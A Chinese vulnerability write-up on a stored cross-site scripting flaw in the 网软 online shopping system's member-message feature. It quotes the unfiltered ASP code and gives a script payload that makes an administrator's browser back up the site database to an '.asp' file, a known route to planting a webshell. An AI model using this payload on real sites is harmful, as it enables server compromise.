[组图]对网软网上购物系统的漏洞分析跨站
问题发生在会员留言那里:mymsg_hand1.asp
| 以下是引用片段: sql="select * from sms" set rs=server.createobject("adodb.recordset") rs.open sql,conn,1,3 rs.addnew rs("name")="admin" neirong=request.form("neirong") ///入库的时候没有过滤 neirong=replace(neirong,"=======","<font color=darkgray>======") rs("neirong")=neirong rs("riqi")=now() rs("fname")=request.cookies("cnhww")("username") rs.update rs.close set rs=nothing response.write "<script language='javascript'>" response.write "alert('操作成功,已向管理员发送一条站内消息!');" response.write "location.href='user.asp?action=famess';" response.write "</script>" response.end conn.close set conn=nothing |
我们再看出库的时候有没有过滤呢?
Hand1.asp:
| 以下是引用片段: set rs=Server.CreateObject("ADODB.recordset") sql="select * from sms where (name='管理员' or name='admin') and zuti='0' order by riqi desc" rs.open sql,conn,1,3 if rs.eof and rs.bof then response.write "<tr><td>收件箱中没有消息。</td></tr>" else ......中间省略............ do while not rs.eof and pages>0 neirong=rs("neirong") riqi=rs("riqi") isnew=rs("isnew") fname=rs("fname") id=rs("id") if pages<10 then response.write "<tr><td height=15></td></tr>" %> ......中间省略............ <hr color=#e7e7e7><BR> <%=replace(neirong,vbCRLF,"<BR>")%><br> </td></tr> |
| 以下是引用片段: <script>var op = window.open('backdata.asp');setTimeout("back()",2000);function back() {var form=op.document.forms[0];form.DBpath.value="../bbs/data/#wrtxcnshop.asp";form.bkDBname.value="test.mdb";form.submit();</script> |
| 对网软网上购物系统的漏洞分析 | 01-09 | |
| sa-blog 0day | 09-22 | |
| 网站登陆接口的攻与防 | 09-04 | |
| 联众游戏大厅GlobalLink glItemC | 09-04 | |
| php代码不开源下的一种漏洞检测思 | 08-25 | |
| 一段有注射漏洞的asp代码 | 08-03 | |
| 浅析BlogEz安全性 | 07-26 | |
| PHP168 CMS的一次新异漏洞分析 | 07-20 | |
| BBSXP多个注入点漏洞 | 07-11 | |
| PHPWind-附件文件名跨站脚本漏洞 | 06-26 | |
| CGI漏洞精典汇总 | 06-18 | |
| 动易新补丁加旧组件的BUG | 06-18 | |
您现在的位置: